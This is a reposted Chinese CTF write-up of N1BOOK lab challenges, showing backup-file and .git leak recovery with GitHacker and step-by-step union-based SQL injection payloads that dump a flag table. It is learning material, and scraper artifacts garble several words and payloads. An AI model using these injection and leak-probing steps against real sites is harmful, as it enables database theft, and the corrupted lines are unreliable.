大佬教程收集整理的这篇文章主要介绍了N1BOOK 记录,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
参考《从0到1 CTFer成长之路》
filename~,比如index.PHP~@H_502_12@
.filename.swp或者*.swo或者*.swn,比如.index.PHP.swp@H_502_12@
/index.PHP~
/.index.PHP.swp会即刻下载备份文件,可通过vi index.PHP建@L_197_14@只有空格的文件,然后通过vim -r index.PHP进行恢复即可得到
/robots.txt
git泄露
git clone https://github.com/WangYihang/GitHacker.git@H_502_12@
cd GitHacker@H_502_12@
python Githacker.py http://0fcbe3ec-471a-452a-9e5f-953c5026eb18.node3.buuoj.cn/.git
cd 0fcbe3ec-471a-452a-9e5f-953c5026eb18_node3_buuoj_cn_,有个index.html
id=1+1的回显,发现和id=1结果相同,所以不是数字型注入,可能是字符型
id=1a发现和id=1结果相同,所以确实是字符型
id=1'#,单引号用于闭合前面的单引号,井号用于注释后面预置的单引号。这里注意:#一定要用URL编码,即%23,所以实际上需要输入id=1'%23单引号会被自动转成%27
id=-1'union SELEct 1,2,3%23,其中-1是为了使第一行记录无法被@L_262_40@到,当然,除了-1也可以是@L_197_14@很大的值比如1024、100等。后面的@L_262_40@语句是尝试测试哪些字段可以回显参考
GROUP_CONCAt(table_Name),GROUP_CONCAt是用,联合多行记录的函数。所以为@L_262_40@本数据库的其他所有表名,需id=-1'union SELEct 1,GROUP_CONCAt(table_Name),3 from information_scheR_675_11845@a.tables where table_scheR_675_11845@a=database()%23,随即看到fl4g
id=-1'union SELEct 1,GROUP_CONCAt(column_Name),3 from information_scheR_675_11845@a.columns where table_name='fl4g'%23
id=-1'union SELEct 1,fllllag,3 from fl4g%23
直接拖到ida64反编译即可看到flag
以上是大佬教程为你收集整理的N1BOOK 记录全部内容,希望文章能够帮你解决N1BOOK 记录所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。